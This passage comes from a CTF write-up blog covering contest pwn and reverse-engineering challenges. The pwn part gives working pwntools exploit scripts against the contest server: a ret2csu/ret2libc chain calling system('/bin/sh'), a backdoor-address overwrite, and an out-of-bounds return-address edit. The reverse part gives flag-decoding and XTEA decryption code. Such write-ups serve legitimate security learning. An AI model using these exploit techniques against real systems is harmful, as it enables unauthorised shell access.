class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#coding:utf-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><span class="hljs-comment"># from LibcSearcher import*</span><br><span class="hljs-comment"># sh = process('./chal')</span><br>sh = remote(<span 
class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">31971</span>)<br>elf = ELF(<span class="hljs-string">'./chal'</span>)<br><span class="hljs-comment"># libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')</span><br><span class="hljs-comment"># libc = ELF('../../tools/libc-database/db/libc6_2.23-0ubuntu10_amd64.so')</span><br>libc = ELF(<span class="hljs-string">'libc.so.6'</span>)<br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br>context.log_level = <span class="hljs-string">'DEBUG'</span><br><span class="hljs-comment"># context.terminal = ['tmux','splitw','-h']</span><br>gadgets1 = <span class="hljs-number">0x000000000040132A</span><br>gadgets2 = <span class="hljs-number">0x0000000000401310</span><br>write_got = elf.got[<span class="hljs-string">'write'</span>]<br>main_addr = elf.symbols[<span class="hljs-string">'main'</span>]<br>offset = <span class="hljs-string">b'\0'</span>*(<span class="hljs-number">0x10</span>+<span class="hljs-number">8</span>)<br><span class="hljs-keyword">def</span> <span class="hljs-title function_">csu</span>(<span class="hljs-params">r12,r13,r14,r15,ret_addr</span>):<br> payload = offset<br> payload += p64(gadgets1)<br> <span class="hljs-comment"># payload += b"\0"*8</span><br> payload += p64(<span class="hljs-number">0</span>)<br> payload += p64(<span class="hljs-number">1</span>)<br> payload += p64(r12)<br> payload += p64(r15)<br> payload += p64(r14)<br> payload += p64(r13)<br> payload += p64(gadgets2) <br> payload += <span class="hljs-string">b"\0"</span>*<span class="hljs-number">56</span><br> payload += p64(ret_addr)<br> sh.sendline(payload)<br><span class="hljs-comment"># sh.recvuntil("this\n")</span><br>csu(<span class="hljs-number">1</span>,write_got,<span class="hljs-number">8</span>,write_got,main_addr)<br>write_addr = u64(sh.recvuntil(<span class="hljs-string">b'\x7f'</span>)[-<span class="hljs-number">6</span>:].ljust(<span 
class="hljs-number">8</span>, <span class="hljs-string">b'\0'</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-built_in">hex</span>(write_addr))<br>offset_addr = write_addr - libc.symbols[<span class="hljs-string">'write'</span>]<br>success(<span class="hljs-string">"offset_addr = 0x%x"</span>,offset_addr)<br><span class="hljs-comment"># libc = LibcSearcher('write',write_addr)</span><br><span class="hljs-comment"># base = write_addr - libc.dump('write')</span><br><span class="hljs-comment"># system = base + libc.dump('system')</span><br><span class="hljs-comment"># binsh = base + libc.dump('str_bin_sh')</span><br><span class="hljs-comment"># print("123"+libc.dump('str_bin_sh'))</span><br>system_addr = offset_addr + libc.symbols[<span class="hljs-string">'system'</span>]<br><span class="hljs-built_in">print</span>(<span class="hljs-string">"execve:"</span>,<span class="hljs-built_in">hex</span>(system_addr))<br>binsh_address = <span class="hljs-built_in">next</span>(libc.search(<span class="hljs-string">b'/bin/sh\x00'</span>))<br><span class="hljs-built_in">print</span>(<span class="hljs-string">"binsh:"</span>,<span class="hljs-built_in">hex</span>(binsh_address))<br><span class="hljs-comment">#gdb.attach(sh)</span><br>sh.recvuntil(<span class="hljs-string">"this\n"</span>)<br>payload = offset<br>payload+= p64(<span class="hljs-number">0x000000000040101a</span>)<span class="hljs-comment">#ret_addr</span><br>payload+= p64(<span class="hljs-number">0x0000000000401333</span>)<span class="hljs-comment"># pop_rdi_ret</span><br>payload+= p64(offset_addr+binsh_address)<br>payload+= p64(system_addr)<br>sh.sendline(payload)<br>sh.interactive()<br></code></pre></td></tr></table></figure><h2 id="password"><a href="#password" class="headerlink" title="password"></a>password</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">'debug'</span><br><br><span class="hljs-comment"># context.terminal = ['gnome-terminal', '-x', 'sh', '-c']</span><br><span class="hljs-comment"># p = gdb.debug('./password')</span><br><span class="hljs-comment"># p = process('./password')</span><br><br>p = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">31300</span>)<br><br><span class="hljs-comment"># res = b'wrong'</span><br>ret = <span class="hljs-number">0x000000000040101a</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">1000</span>):<br> p = remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span 
class="hljs-number">31300</span>)<br> <span class="hljs-comment"># p = process('./password')</span><br> pad = <span class="hljs-string">b'\0'</span>*<span class="hljs-number">0x28</span><br> backdoor = p64(<span class="hljs-number">0x4012F3</span>)<br> pl1 = pad + backdoor<br> p.send(pl1)<br> p.recvuntil(<span class="hljs-string">b'password:\n'</span>)<br> p.sendline(<span class="hljs-string">b'\x00'</span>)<br> res = p.recvline()<br> <span class="hljs-keyword">if</span> <span class="hljs-string">b'Correct'</span> <span class="hljs-keyword">in</span> res:<br> <span class="hljs-built_in">print</span>(<span class="hljs-string">'ok'</span>)<br> <span class="hljs-keyword">break</span><br>p.interactive()<br><span class="hljs-comment"># res = b'wrong'</span><br><span class="hljs-comment"># while b'wrong' in res:</span><br><span class="hljs-comment"># p = process('./password')</span><br><span class="hljs-comment"># pad = b'a'*0x20</span><br><span class="hljs-comment"># backdoor = p64(0x4012F3)</span><br><span class="hljs-comment"># pl1 = pad + backdoor</span><br><span class="hljs-comment"># p.sendline(pl1)</span><br><span class="hljs-comment"># p.recvuntil('password:')</span><br><span class="hljs-comment"># p.sendline(b'')</span><br><span class="hljs-comment"># res = p.recvall()</span><br><br></code></pre></td></tr></table></figure><h2 id="write1"><a href="#write1" class="headerlink" title="write1"></a>write1</h2><p>[<a href="https://blog.csdn.net/mcmuyanga/article/details/114673240">BUUCTF]PWN——wustctf2020_name_your_cat (array out-of-bounds)_pwn ctf out-of-bounds write - CSDN blog</a></p><p>That challenge is similar to ours: both modify an address through an out-of-bounds array write. Note, however, that its array is written one byte at a time, whereas this challenge writes eight bytes at a time, so p64(address) can be used directly.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs c">*(v2 + v1) += 
tmp;<br></code></pre></td></tr></table></figure><p>This is the key statement: it uses +=, not =, so it does not overwrite. We have to input a value that is added to or subtracted from what is stored at that address, so that it ends up equal to our return address.</p><p>Stepping through it in gdb, we can see that when we input index 41 and value -1, the return address changes from 40134D to 40124D. That is exactly what we want: we turn it into our return address.</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231029221238038.png" alt="image-20231029221238038"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br><br>context.log_level = <span class="hljs-string">'debug'</span><br>context(arch=<span class="hljs-string">'amd64'</span>, os=<span class="hljs-string">'linux'</span>)<br><span class="hljs-comment"># p=process('chal')</span><br>p=remote(<span class="hljs-string">'pwn.node.game.sycsec.com'</span>,<span class="hljs-number">31277</span>)<br><span class="hljs-comment"># p=gdb.debug('./chal')</span><br><span class="hljs-comment"># p=remote("node3.buuoj.cn",28477)</span><br><span class="hljs-comment">#p=process('./wustctf2020_name_your_cat')</span><br><span class="hljs-comment"># 
elf=ELF('./wustctf2020_name_your_cat')</span><br><br>shell_addr=<span class="hljs-number">0x401221</span><br><br>p.sendline(<span class="hljs-string">b'aaaaaaaaaaa'</span>)<br><br>p.sendlineafter(<span class="hljs-string">'index:\n'</span>,<span class="hljs-string">b'41'</span>)<br>p.sendlineafter(<span class="hljs-string">"value:"</span>,<span class="hljs-string">b'-1'</span>)<br><br>p.sendlineafter(<span class="hljs-string">'index:\n'</span>,<span class="hljs-string">b'40'</span>)<br>p.sendlineafter(<span class="hljs-string">"value:"</span>,<span class="hljs-string">b'-2b'</span>)<br><br>p.sendlineafter(<span class="hljs-string">'index:\n'</span>,<span class="hljs-string">b'-1'</span>)<br><br><br>p.interactive()<br><br></code></pre></td></tr></table></figure><h1 id="re"><a href="#re" class="headerlink" title="re"></a>re</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs python">a=<span class="hljs-string">"Z`J[X^LMNO`PPJPVQRSIUTJ]IMNOZKMM"</span><br>a=<span class="hljs-built_in">list</span>(a)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">ord</span>(a[i])-<span class="hljs-number">7</span>),end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h2 id="砍树"><a href="#砍树" class="headerlink" title="砍树"></a>Cut the tree</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span 
class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs python">enc =[<br> <span class="hljs-number">0x00</span>, <span class="hljs-number">0x20</span>, <span class="hljs-number">0x20</span>, <span class="hljs-number">0x17</span>, <span class="hljs-number">0x1B</span>, <span class="hljs-number">0x36</span>, <span class="hljs-number">0x0E</span>, <span class="hljs-number">0x36</span>, <span class="hljs-number">0x26</span>, <span class="hljs-number">0x17</span>, <br> <span class="hljs-number">0x04</span>, <span class="hljs-number">0x2A</span>, <span class="hljs-number">0x29</span>, <span class="hljs-number">0x07</span>, <span class="hljs-number">0x26</span>, <span class="hljs-number">0x15</span>, <span class="hljs-number">0x52</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0x2D</span>, <span class="hljs-number">0x0F</span>, <br> <span class="hljs-number">0x3A</span>, <span class="hljs-number">0x27</span>, <span class="hljs-number">0x11</span>, <span class="hljs-number">0x06</span>, <span class="hljs-number">0x33</span>, <span class="hljs-number">0x07</span>, <span class="hljs-number">0x46</span>, <span class="hljs-number">0x17</span>, <span class="hljs-number">0x3D</span>, <span class="hljs-number">0x0A</span>, <br> <span class="hljs-number">0x3C</span>, <span class="hljs-number">0x38</span>, <span class="hljs-number">0x2E</span>, <span class="hljs-number">0x22</span>, <span class="hljs-number">0x18</span><br>]<br><br>key = <span class="hljs-string">"Sycloverforerver"</span><br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(enc)):<br> enc[i]=enc[i]^<span class="hljs-built_in">ord</span>(key[i%<span 
class="hljs-built_in">len</span>(key)])<br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(enc[i])),end=<span class="hljs-string">''</span>)<br><br><span class="hljs-comment"># print(0x1B^ord('{'))</span><br></code></pre></td></tr></table></figure><h2 id="听说cpp很难?"><a href="#听说cpp很难?" class="headerlink" title="听说cpp很难?"></a>Heard that cpp is hard?</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs python">a=[<span class="hljs-number">77</span>, <span class="hljs-number">95</span>, <span class="hljs-number">61</span>, <span class="hljs-number">55</span>, <span class="hljs-number">104</span>, <span class="hljs-number">115</span>, <span class="hljs-number">87</span>, <span class="hljs-number">39</span>, <span class="hljs-number">104</span>, <span class="hljs-number">81</span>, <span class="hljs-number">89</span>, <span class="hljs-number">127</span>, <span class="hljs-number">38</span>, <span class="hljs-number">107</span>, <span class="hljs-number">89</span>, <span class="hljs-number">115</span>, <span class="hljs-number">87</span>, <span class="hljs-number">85</span>, <span class="hljs-number">91</span>, <span class="hljs-number">89</span>, <span class="hljs-number">111</span>, <span class="hljs-number">106</span>, <span class="hljs-number">89</span>, <span class="hljs-number">39</span>, <span class="hljs-number">87</span>, <span class="hljs-number">114</span>, <span class="hljs-number">87</span>, <span class="hljs-number">79</span>, <span class="hljs-number">87</span>, <span class="hljs-number">120</span>, <span class="hljs-number">120</span>]<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> 
<span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(a)):<br> a[i]=((a[i]+<span class="hljs-number">10</span>)^<span class="hljs-number">10</span>)-<span class="hljs-number">10</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(a[i]),end=<span class="hljs-string">''</span>)<br><br><span class="hljs-comment"># print((71^ 10)-10)</span><br></code></pre></td></tr></table></figure><h2 id="rainbow"><a href="#rainbow" class="headerlink" title="rainbow"></a>rainbow</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python">ida_chars =[<br> <span class="hljs-number">0x65</span>, <span class="hljs-number">0x58</span>, <span class="hljs-number">0x41</span>, <span class="hljs-number">0x8E</span>, <span class="hljs-number">0x50</span>, <span class="hljs-number">0x44</span>, <span class="hljs-number">0x7B</span>, <span class="hljs-number">0x62</span>, <span class="hljs-number">0x57</span>, <span class="hljs-number">0x4A</span>, <br> <span class="hljs-number">0x7E</span>, <span class="hljs-number">0x54</span>, <span class="hljs-number">0x49</span>, <span class="hljs-number">0x6C</span>, <span class="hljs-number">0x7D</span>, <span class="hljs-number">0x84</span>, <span class="hljs-number">0x4F</span>, <span class="hljs-number">0x5B</span>, <span class="hljs-number">0x95</span>, <span class="hljs-number">0x60</span>, <br> <span class="hljs-number">0x60</span>, <span 
class="hljs-number">0x64</span>, <span class="hljs-number">0x77</span>, <span class="hljs-number">0x48</span>, <span class="hljs-number">0x7D</span>, <span class="hljs-number">0x4D</span>, <span class="hljs-number">0x7B</span>, <span class="hljs-number">0x9F</span>, <span class="hljs-number">0x68</span>, <span class="hljs-number">0x3C</span>, <br> <span class="hljs-number">0x2D</span>, <span class="hljs-number">0x62</span><br>]<br><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(ida_chars)):<br> ida_chars[i]^=i<br> <span class="hljs-comment"># print(chr(ida_chars[i]),end='')</span><br><span class="hljs-comment"># q=1</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(ida_chars)):<br> <span class="hljs-keyword">if</span>(i%<span class="hljs-number">3</span>==<span class="hljs-number">0</span>):<br> ida_chars[i]-=<span class="hljs-number">18</span><br> <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(ida_chars[i]),end=<span class="hljs-string">''</span>)<br></code></pre></td></tr></table></figure><h2 id="小黄鸭"><a href="#小黄鸭" class="headerlink" title="小黄鸭"></a>Little yellow duck</h2><p>Brute-force it directly. One pitfall: the original challenge contains</p><p>if chr(ord(a[1])) != 's' or ord(a[2]) != 109 or chr(ord(a[17])) != 'C':</p><p>which is really just telling us that the third-from-last character is m. Unbelievable.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span><span class="hljs-string"><string.h></span></span><br><br><span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span><br>{<br><span class="hljs-type">char</span> a[] = { <span class="hljs-string">'H'</span>, <span class="hljs-string">'N'</span>, <span class="hljs-string">'R'</span>, <span class="hljs-string">'|'</span>, <span class="hljs-string">'2'</span>, <span class="hljs-string">'`'</span>, <span class="hljs-string">'w'</span>, <span class="hljs-string">'1'</span>, <span class="hljs-string">'e'</span>, <span class="hljs-string">'t'</span>, <span class="hljs-string">'`'</span>, <span class="hljs-string">'n'</span>, <span class="hljs-string">'D'</span>, <span class="hljs-string">'j'</span>, <span class="hljs-string">'`'</span>, <span class="hljs-string">'R'</span>, <span class="hljs-string">'w'</span>, <span class="hljs-string">'P'</span>, <span 
class="hljs-string">'h'</span>, <span class="hljs-string">'t'</span>, <span class="hljs-string">'`'</span>, <span class="hljs-string">'N'</span>, <span class="hljs-string">'d'</span>, <span class="hljs-string">'J'</span>, <span class="hljs-string">'g'</span>, <span class="hljs-string">'`'</span>, <span class="hljs-string">'s'</span>, <span class="hljs-string">'g'</span>, <span class="hljs-string">'4'</span>, <span class="hljs-string">'p'</span>, <span class="hljs-string">'|'</span>, <span class="hljs-string">'h'</span>, <span class="hljs-string">'~'</span> };<br><span class="hljs-type">int</span> i, j, k;<br><span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i< <span class="hljs-number">33</span>;i++)<br><span class="hljs-keyword">for</span> (k = <span class="hljs-number">32</span>; k < <span class="hljs-number">127</span>; k++)<br>{<br>j = k;<br><span class="hljs-keyword">if</span> (j >= <span class="hljs-string">'a'</span> && j <= <span class="hljs-string">'z'</span>)<br>{<br>j += <span class="hljs-number">13</span>;<br><span class="hljs-keyword">if</span> (j <= <span class="hljs-string">'a'</span> || j >= <span class="hljs-string">'z'</span>)<br>j -= <span class="hljs-number">26</span>;<br>j += <span class="hljs-number">2</span>;<br>}<br><span class="hljs-keyword">else</span><br>{<br><span class="hljs-keyword">if</span> (j >= <span class="hljs-string">'A'</span> && j <= <span class="hljs-string">'Z'</span>)<br>{<br>j += <span class="hljs-number">13</span>;<br><span class="hljs-keyword">if</span> (j <= <span class="hljs-string">'A'</span> || j >= <span class="hljs-string">'Z'</span>)<br>j -= <span class="hljs-number">26</span>;<br>j += <span class="hljs-number">2</span>;<br>}<br><span class="hljs-keyword">else</span><br>{<br>j += <span class="hljs-number">1</span>;<br>}<br><br>}<br><span class="hljs-keyword">if</span> (j == a[i])<br>{<br><span class="hljs-built_in">printf</span>(<span class="hljs-string">"%c"</span>, k);<br>}<br>}<br><span 
class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure><h2 id="flower-or-tea"><a href="#flower-or-tea" class="headerlink" title="flower-or-tea"></a>flower-or-tea</h2><p><a href="https://g2uge.github.io/2022/02/28/TEA%E7%B3%BB%E5%88%97%E5%8A%A0%E5%AF%86%E8%A7%A3%E5%AF%86/">TEA-family encryption and decryption | Gruge's Blog (g2uge.github.io)</a></p><p>This was my first real encounter with TEA encryption; I learned the characteristics of TEA, XTEA and XXTEA.</p><p>Pitfall one: the input is read from both ends towards the middle. This actually does not matter; just decrypt the flag and rearrange it afterwards.</p><p>Pitfall two: this is XTEA with a modified constant and round count. Both are handled by slightly adjusting the standard script.</p><p>Pitfall three: in the original encryption function, the 4 in *(key + 4 * ((sum >> 11) & 3)) is only there to confuse; since this is address arithmetic, it can be replaced with the following:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-built_in">int</span> __cdecl tea(unsigned <span class="hljs-built_in">int</span> a1, unsigned <span class="hljs-built_in">int</span> *enc, <span class="hljs-built_in">int</span> key)<br>{<br> <span class="hljs-built_in">int</span> result; // eax<br> unsigned <span class="hljs-built_in">int</span> i; // [esp+8h] [ebp-10h]<br> unsigned <span class="hljs-built_in">int</span> v1; // [esp+Ch] [ebp-Ch]<br> unsigned <span class="hljs-built_in">int</span> v0; // [esp+10h] [ebp-8h]<br> unsigned <span class="hljs-built_in">int</span> <span 
class="hljs-built_in">sum</span>; // [esp+14h] [ebp-4h]<br><br> v0 = *enc;<br> v1 = enc[<span class="hljs-number">1</span>];<br> <span class="hljs-built_in">sum</span> = <span class="hljs-number">0</span>;<br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i < a1; ++i )<br> {<br> v1 += <span class="hljs-built_in">sum</span> ^ (*(key + <span class="hljs-number">4</span> * ((<span class="hljs-built_in">sum</span> >> <span class="hljs-number">11</span>) & <span class="hljs-number">3</span>)) + <span class="hljs-built_in">sum</span>) ^ (v0 + ((v0 >> <span class="hljs-number">5</span>) ^ (<span class="hljs-number">16</span> * v0)));<br> v0 += (*(key + <span class="hljs-number">4</span> * (<span class="hljs-built_in">sum</span> & <span class="hljs-number">3</span>)) + <span class="hljs-built_in">sum</span>) ^ (v1 + ((v1 >> <span class="hljs-number">5</span>) ^ (<span class="hljs-number">16</span> * v1)));<br> <span class="hljs-built_in">sum</span> += <span class="hljs-number">0x31415927</span>;<br> }<br> *enc = v0;<br> result = <span class="hljs-number">4</span>;<br> enc[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-keyword">return</span> result;<br>}<br></code></pre></td></tr></table></figure><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs c">v1 += (((v0 << <span class="hljs-number">4</span>) ^ (v0 >> <span class="hljs-number">5</span>)) + v0) ^ ((<span class="hljs-built_in">sum</span> + key[ ((<span class="hljs-built_in">sum</span> >> <span class="hljs-number">11</span>) & <span class="hljs-number">3</span>)])^<span class="hljs-built_in">sum</span>);<br>v0 += (((v1 << <span class="hljs-number">4</span>) ^ (v1 >> <span class="hljs-number">5</span>)) + v1) ^ (<span class="hljs-built_in">sum</span> + key[(<span class="hljs-built_in">sum</span> & <span 
class="hljs-number">3</span>)]);<br></code></pre></td></tr></table></figure><p>Pitfall four: in the decryption code, remember to invert every operation according to the logic of the encryption.</p><p>Decryption script:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><code class="hljs c"><span 
class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdint.h></span></span><br><br><span class="hljs-comment">/* take 64 bits of data in v[0] and v[1] and 128 bits of key[0] - key[3] */</span><br><br><span class="hljs-type">void</span> <span class="hljs-title function_">encipher</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> num_rounds, <span class="hljs-type">uint32_t</span> v[<span class="hljs-number">2</span>], <span class="hljs-type">uint32_t</span> <span class="hljs-type">const</span> key[<span class="hljs-number">4</span>])</span> {<br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> i;<br> <span class="hljs-type">uint32_t</span> v0 = v[<span class="hljs-number">0</span>], v1 = v[<span class="hljs-number">1</span>], sum = <span class="hljs-number">0</span>, delta = <span class="hljs-number">0x31415927</span>;<br> <span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < num_rounds; i++) {<br> v1 += (((v0 << <span class="hljs-number">4</span>) ^ (v0 >> <span class="hljs-number">5</span>)) + v0) ^ ((sum + key[ ((sum >> <span class="hljs-number">11</span>) & <span class="hljs-number">3</span>)])^sum);<br> v0 += (((v1 << <span class="hljs-number">4</span>) ^ (v1 >> <span class="hljs-number">5</span>)) + v1) ^ (sum + key[(sum & <span class="hljs-number">3</span>)]);<br> sum += delta;<br> }<br> v[<span class="hljs-number">0</span>] = v0; v[<span class="hljs-number">1</span>] = v1;<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"加密后的数据:%u %u\n"</span>, v[<span class="hljs-number">0</span>], v[<span class="hljs-number">1</span>]);<br>}<br><br><span class="hljs-type">void</span> <span class="hljs-title function_">decipher</span><span class="hljs-params">(<span 
